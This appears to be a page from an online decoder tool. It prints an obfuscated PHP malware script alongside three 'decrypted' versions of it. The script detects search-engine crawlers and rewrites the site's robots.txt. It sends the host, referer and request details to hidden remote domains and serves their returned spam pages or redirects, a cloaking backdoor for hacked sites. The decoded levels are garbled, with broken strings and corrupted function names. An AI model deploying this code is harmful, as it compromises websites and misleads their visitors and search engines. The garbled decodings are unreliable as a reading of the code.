Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
 goto PbqcS; oA1jF: preg_match("\57\134\57\x28\133\x5e\134\57\135\x2b\x5c\x2e\160\x68\160\51\57", $duri, $matches); goto V4TXu; glvMQ: $model = "\151\x6e\x64\145\x78"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["\x48\x54\124\120\x5f\x55\123\105\122\x5f\101\x47\105\116\x54"]) ? strtolower($_SERVER["\110\124\124\x50\x5f\125\x53\x45\x52\x5f\101\x47\105\x4e\124"]) : ''; $bots = array("\x67\157\157\147\154\x65\x62\x6f\164", "\142\151\156\x67", "\x79\x61\x68\157\157", "\147\157\x6f\147\154\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "\57"; goto mNuTN; giV3H: $host = $_SERVER["\x48\124\x54\120\x5f\110\117\x53\x54"] ?: ''; goto Zf57p; mNuTN: $model_file = "\x69\x6e\144\145\170\x2e\160\x68\x70"; goto glvMQ; Rh3mE: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\164\164\x70\72\57\57" . $domain_decoded . "\x2f\163\x75\x70\145\x72\66\56\160\150\160\77" . $param; if (function_exists("\x77\x70\x5f\x72\145\x6d\x6f\164\x65\137\x67\x65\164")) { $response = wp_remote_get($url, array("\164\x69\155\x65\x6f\x75\164" => 30, "\165\163\145\162\55\x61\147\x65\x6e\164" => "\x4d\x6f\172\151\x6c\x6c\141\57\x35\56\60\x20\x28\143\x6f\155\160\x61\164\151\x62\x6c\x65\x3b\x20\127\157\x72\144\x50\x72\145\x73\x73\51")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\165\162\154\137\x69\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\141\154\154\x6f\x77\137\x75\x72\154\137\146\x6f\160\x65\156")) { $context = stream_context_create(array("\150\x74\x74\160" => array("\164\151\155\x65\157\x75\164" => 30))); $response = $functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\x6e\157\x62\x6f\x74\165\163\145\162\x61\147\x65\156\x74"; } goto pKNVW; hZofn: create_robots($http . "\72\x2f\x2f" . $host); goto wZzhi; JY16z: $param = http_build_query(array("\x77\145\x62" => $host, "\172\x7a" => $zz, "\165\162\151" => urlencode($duri), "\x75\x72\154\x73\x68\x61\156\x67" => $referer, "\150\164\164\x70" => $http, "\154\141\156\x67" => $lang, "\x73\x65\162\x76\145\x72" => $server, "\155\157\x64\x65\x6c" => $model, "\x76\145\162\163\x69\157\156" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "\156\x6f\x62\157\x74\165\x73\145\162\x61\x67\145\x6e\164") === false) { $response_handlers = array("\x6f\153\x68\x74\x6d\154" => array("\x68\145\141\144\145\162" => "\103\157\x6e\164\145\156\164\x2d\164\171\x70\x65\72\x20\x74\x65\170\164\x2f\x68\x74\x6d\154\73\40\143\150\x61\162\x73\145\164\75\x75\x74\146\x2d\x38", "\x72\145\160\154\141\143\x65" => "\x6f\x6b\150\164\155\x6c", "\x74\145\163\164\x5f\x65\143\150\157" => true, "\x6f\165\164\x70\x75\164" => true), "\147\x65\x74\143\x6f\x6e\x74\145\x6e\x74\x35\60\60\x70\x61\x67\x65" => array("\150\145\141\x64\145\x72" => "\110\x54\124\x50\57\61\x2e\61\40\x35\60\x30\40\x49\156\x74\x65\162\156\141\x6c\x20\123\145\162\x76\145\x72\40\x45\162\x72\x6f\162"), "\x34\60\x34\160\141\x67\x65" => array("\150\145\141\x64\x65\162" => "\110\x54\x54\x50\57\x31\56\61\x20\64\60\64\x20\x4e\157\164\40\106\x6f\165\x6e\x64"), "\x33\60\x31\160\x61\147\145" => array("\150\145\141\144\145\162" => "\110\x54\124\120\57\x31\56\x31\40\63\x30\x31\x20\115\x6f\x76\x65\x64\40\x50\x65\162\155\x61\x6e\x65\x6e\x74\154\171", "\x72\145\160\x6c\141\143\145" => "\x33\60\61\160\141\147\x65", "\x72\145\x64\151\x72\145\143\x74" => true), "\x6f\x6b\x78\155\154" => array("\x68\x65\141\144\145\x72" => "\x43\157\x6e\164\145\156\x74\55\124\171\160\x65\72\40\x61\160\160\x6c\x69\x63\141\x74\x69\157\x6e\57\x78\x6d\154\73\x20\143\x68\x61\162\163\x65\x74\x3d\165\164\146\x2d\70", "\162\145\160\154\x61\143\145" => "\x6f\153\x78\x6d\154", "\x6f\165\164\160\165\164" => true), "\x6f\x6b\162\157\142\x6f\164\163" => array("\x68\145\141\x64\145\x72" => "\x43\157\x6e\x74\145\156\164\55\124\x79\160\145\72\x20\x74\x65\x78\164\x2f\160\x6c\141\x69\x6e", "\x72\x65\x70\x6c\141\143\x65" => "\x6f\x6b\x72\157\x62\x6f\164\x73", "\x6f\165\x74\x70\x75\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\x68\x65\x61\144\145\162"]); if (isset($handler["\x72\145\160\154\141\143\x65"])) { $html_content = str_replace($handler["\162\145\x70\x6c\141\143\x65"], '', $html_content); } if (isset($handler["\x74\145\x73\x74\x5f\x65\143\150\157"])) { if ($istest) { echo $string; } } if (isset($handler["\162\145\144\x69\x72\x65\143\x74"])) { header("\x4c\157\143\141\164\151\157\x6e\72\x20" . $html_content); } elseif (isset($handler["\157\x75\x74\x70\165\164"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("\x25\63\x32\x25\63\60\45\63\60\45\63\60\45\62\x44\x25\67\x39\x25\67\x36\45\x36\61\x25\67\70\45\63\x31\x25\63\70\45\x33\x35\45\62\105\x25\x36\63\x25\67\x35\45\66\62\45\x36\66\45\x37\x36\x25\x36\66\x25\x32\105\45\x36\67\45\66\62\45\x36\x33", "\45\x33\62\x25\x33\x30\x25\x33\60\45\x33\60\x25\62\x44\x25\67\71\x25\x37\66\x25\66\x31\45\x37\x38\45\63\x31\x25\63\x38\x25\63\65\x25\62\x45\45\67\x36\x25\x36\61\x25\67\62\45\67\x33\x25\x37\x33\x25\66\x45\x25\x36\106\45\x37\71\45\66\103\45\x32\105\x25\66\102\45\x36\x43\x25\66\x44", "\x25\63\62\45\x33\x30\45\x33\x30\x25\x33\x30\x25\x32\x44\45\67\71\45\67\66\45\x36\61\x25\x37\70\45\63\x31\45\63\70\45\x33\65\x25\62\105\45\x36\x46\x25\x36\65\45\x37\66\x25\67\64\45\x37\65\x25\66\x37\x25\x37\x35\x25\66\62\x25\x36\x35\45\x37\x36\x25\x36\x33\45\x32\x45\x25\x36\102\45\x36\103\45\x36\x44", "\45\63\62\x25\63\x30\x25\x33\60\45\x33\60\45\62\104\45\67\71\45\67\x36\45\66\61\x25\67\x38\x25\x33\61\x25\x33\70\x25\63\x35\x25\x32\105\45\66\x31\x25\x37\62\x25\66\x42\45\66\67\x25\x37\x32\45\x36\61\45\x36\x33\45\x36\x38\x25\66\x33\45\x36\x33\x25\62\105\45\66\x42\x25\x36\x43\x25\x36\104"); goto joeE2; m1uWV: $server = file_exists($_SERVER["\x44\117\103\x55\115\105\x4e\x54\x5f\x52\117\117\x54"] . "\57\56\x68\x74\141\143\x63\145\163\x73") ? 1 : 2; goto Qo5Bv; joeE2: $string = "\62\60\60\x30\x2d\x6c\x69\x6e\153\x31\x38\65"; goto giV3H; tSR17: $model = stristr($duri, "\x2f\x3f") ? "\x3f" : $model; goto NAO5P; tzIxD: function create_robots($url) { $functions = func(); $path = $_SERVER["\x44\x4f\x43\x55\x4d\105\x4e\x54\137\x52\117\117\124"] . "\x2f\x72\157\142\157\x74\x73\x2e\164\x78\164"; $content = "\125\x73\x65\x72\x2d\141\147\x65\x6e\x74\72\40\x2a\12\101\154\x6c\x6f\x77\72\40\x2f\12\xa\123\x69\x74\x65\155\x61\x70\x3a\x20" . $url . "\57\x73\x69\x74\x65\x6d\141\x70\x2e\170\155\154\xa"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = @$functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "\150\164\164\x70\x73" : "\150\164\x74\x70"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["\x52\105\x51\125\x45\x53\x54\137\x55\122\111"])) { return $_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\122\111"]; } if (isset($_SERVER["\x61\162\x67\x76"])) { return $_SERVER["\x50\x48\120\x5f\x53\x45\114\106"] . "\77" . $_SERVER["\x61\x72\147\166"][0]; } return $_SERVER["\120\110\x50\137\x53\105\x4c\106"] . "\77" . $_SERVER["\121\x55\105\x52\x59\137\x53\x54\x52\111\x4e\x47"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\57"); } $model = str_replace("\x2e\x70\x68\x70", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["\x48\124\x54\120\x5f\101\x43\103\x45\x50\124\x5f\114\101\116\107\x55\x41\x47\105"] ?: "\x65\x6e"; goto EDS9u; EDS9u: $referer = $_SERVER["\110\124\124\x50\137\x52\105\106\105\122\105\122"] ?: ''; goto KHVIK; E4QIK: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\57\x69\x6e\144\145\x78\x2e\160\x68\x70", '', $duri); $duri = str_replace("\x21", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["\110\124\x54\120\123"])) { $https = strtolower($_SERVER["\x48\x54\x54\120\123"]); if ($https !== "\x6f\146\146") { if ($https !== '') { return true; } } } if (isset($_SERVER["\x48\124\x54\120\x5f\x58\137\106\x4f\x52\x57\x41\x52\x44\105\x44\137\120\122\117\x54\117"])) { if ($_SERVER["\110\124\x54\120\x5f\130\137\x46\117\122\127\101\x52\x44\x45\104\x5f\120\122\117\x54\x4f"] === "\150\164\x74\160\x73") { return true; } } if (isset($_SERVER["\x48\124\124\x50\137\x46\x52\x4f\116\x54\x5f\x45\x4e\104\x5f\110\124\x54\120\x53"])) { $front_end_https = strtolower($_SERVER["\110\x54\x54\x50\x5f\x46\x52\x4f\116\124\x5f\105\x4e\x44\137\110\124\124\x50\123"]); if ($front_end_https !== "\157\146\146") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() { $chars = range("\141", "\172"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[15] . $chars[20] . $chars[19] . "\137" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\137" . $chars[17] . $chars[14] . $chars[19] . "\61\x33"); }

Show other level

Decrypted code level 1:

goto PbqcS; oA1jF: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto V4TXu; glvMQ: $model = "index"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "/"; goto mNuTN; giV3H: $host = $_SERVER["HTTP_HOST"] ?: ''; goto Zf57p; mNuTN: $model_file = "index.php"; goto glvMQ; Rh3mE: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "http://" . $domain_decoded . "/super6.php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla}.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = $functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto pKNVW; hZofn: create_robots($http . "://" . $host); goto wZzhi; JY16z: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/1.1 Internal Server Error"), "4page" => array("header" => "HTTPy.1 404 Not Found"), "3page" => array("header" => "HTTPyq 1 Moved Permanently", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"])) { if ($istest) { echo $string; } } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("%%30%30%30%2D%79%.1%78%%38+5%2E%63%%62.6/6%66%2E.7%62.3", "+2%30%30+0%2D%79%76%/8%%38%35%2E%%61%72%%73%6E%6F/9%6C*E%6B.C%6D", "%32+0+0%30%2D%79%76.1%78%%38+5%2E.F%65/6%74/5%%75%62%65/6%63*E%6B.C.D", "%32%%30+0%2D%79%%61%78%31%38%%2E%%72%6B%67%72.1.3.8%.3%2E%6B%6C%6D"); goto joeE2; m1uWV: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto Qo5Bv; joeE2: $string = "20-link185"; goto giV3H; tSR17: $model = stristr($duri, "/?") ? "?" : $model; goto NAO5P; tzIxD: function create_robots($url) { $functions = func(); $path = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt"; $content = "User-agent: *
Allow: /
\xaSitemap: " . $url . "/sitemap.xml\xa"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = @$functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "https" : "http"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto EDS9u; EDS9u: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto KHVIK; E4QIK: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/index.php", '', $duri); $duri = str_replace("!", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off") { if ($https !== '') { return true; } } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"])) { if ($_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() { $chars = range("a", "z"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[15] . $chars[20] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[6] . $chars[4] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . ""); }

Decrypted code level 2:

goto PbqcS; oA1jF: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto V4TXu; glvMQ: $model = "index"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "/"; goto mNuTN; giV3H: $host = $_SERVER["HTTP_HOST"] ?: ''; goto Zf57p; mNuTN: $model_file = "indexphp"; goto glvMQ; Rh3mE: function request($webs, $param) {  shuffle($webs); foreach ($webs as $domain) { $domain_decoded = "n"(urldecode($domain)); $url = "http://" . $domain_decoded . "/super6php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla}.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = "u"($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto pKNVW; hZofn: create_robots($http . "://" . $host); goto wZzhi; JY16z: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/11 Internal Server Error"), "4page" => array("header" => "HTTPy1 404 Not Found"), "3page" => array("header" => "HTTPyq 1 Moved Permanently", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"])) { if ($istest) { echo $string; } } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("%%30%30%30%2D%79%.1%78%%38+5%2E%63%%626/6%66%2E7%623", "+2%30%30+0%2D%79%76%/8%%38%35%2E%%61%72%%73%6E%6F/9%6C*E%6BC%6D", "%32+0+0%30%2D%79%761%78%%38+5%2EF%65/6%74/5%%75%62%65/6%63*E%6BCD", "%32%%30+0%2D%79%%61%78%31%38%%2E%%72%6B%67%72138%.3%2E%6B%6C%6D"); goto joeE2; m1uWV: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto Qo5Bv; joeE2: $string = "20-link185"; goto giV3H; tSR17: $model = stristr($duri, "/?") ? "?" : $model; goto NAO5P; tzIxD: function create_robots($url) {  $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt"; $content = "User-agent: *
Allow: /
\xaSitemap: " . $url . "/sitemapxml\xa"; if (!file_exists($path)) { "f"($path, $content); } else { $existing_content = @"u"($path); if ($existing_content !== $content) { "f"($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "https" : "http"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = "u"; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto EDS9u; EDS9u: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto KHVIK; E4QIK: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/indexphp", '', $duri); $duri = str_replace("!", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off") { if ($https !== '') { return true; } } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"])) { if ($_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() { $chars = range("a", "z"); return array(")" . $chars[8] . $chars[11] . "(_" . $chars[15] . $chars[20] . $chars[19] . "_n" . $chars[14] . $chars[13] . $chars[19] . "(" . $chars[13] . $chars[19] . $chars[18], ")" . $chars[8] . $chars[11] . "(_" . $chars[6] . "(" . $chars[19] . "_n" . $chars[14] . $chars[13] . $chars[19] . "(" . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . ""); }

Decrypted code level 3:

goto PbqcS; oA1jF: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto V4TXu; glvMQ: $model = "index"; goto oA1jF; z7Z34: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto xm_XJ; SxYXD: $duri = drequest_uri() ?: "/"; goto mNuTN; giV3H: $host = $_SERVER["HTTP_HOST"] ?: ''; goto Zf57p; mNuTN: $model_file = "indexphp"; goto glvMQ; Rh3mE: function request($webs, $param) {  shuffle($webs); foreach ($webs as $domain) { $domain_decoded = "n"(urldecode($domain)); $url = "http://" . $domain_decoded . "/super6php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla}.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = "u"($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto pKNVW; hZofn: create_robots($http . "://" . $host); goto wZzhi; JY16z: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto hZofn; jz2PR: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/11 Internal Server Error"), "4page" => array("header" => "HTTPy1 404 Not Found"), "3page" => array("header" => "HTTPyq 1 Moved Permanently", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"])) { if ($istest) { echo $string; } } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto z7Z34; PbqcS: $xmlname = array("%%30%30%30%2D%79%.1%78%%38+5%2E%63%%626/6%66%2E7%623", "+2%30%30+0%2D%79%76%/8%%38%35%2E%%61%72%%73%6E%6F/9%6C*E%6BC%6D", "%32+0+0%30%2D%79%761%78%%38+5%2EF%65/6%74/5%%75%62%65/6%63*E%6BCD", "%32%%30+0%2D%79%%61%78%31%38%%2E%%72%6B%67%72138%.3%2E%6B%6C%6D"); goto joeE2; m1uWV: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto Qo5Bv; joeE2: $string = "20-link185"; goto giV3H; tSR17: $model = stristr($duri, "/?") ? "?" : $model; goto NAO5P; tzIxD: function create_robots($url) {  $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt"; $content = "User-agent: *
Allow: /
\xaSitemap: " . $url . "/sitemapxml\xa"; if (!file_exists($path)) { "f"($path, $content); } else { $existing_content = @"u"($path); if ($existing_content !== $content) { "f"($path, $content); } } } goto Rh3mE; KHVIK: $http = is_https() ? "https" : "http"; goto m1uWV; xm_XJ: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto POOXc; V4TXu: if (!empty($matches)) { $model_file = "u"; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto tSR17; dRlJ_: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto E4QIK; Zf57p: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto EDS9u; EDS9u: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto KHVIK; E4QIK: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/indexphp", '', $duri); $duri = str_replace("!", '', $duri); } goto JY16z; POOXc: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off") { if ($https !== '') { return true; } } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"])) { if ($_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off") { if ($front_end_https !== '') { return true; } } } return false; } goto tzIxD; wZzhi: $html_content = request($xmlname, $param); goto jz2PR; Qo5Bv: $zz = disbot(); goto SxYXD; NAO5P: $istest = false; goto dRlJ_; pKNVW: function func() {  return array(")""(_" . $chars[15] . $chars[20] . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], ")""(_"(" . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . ")" . $chars[19] . ""); }

Recent submissions:

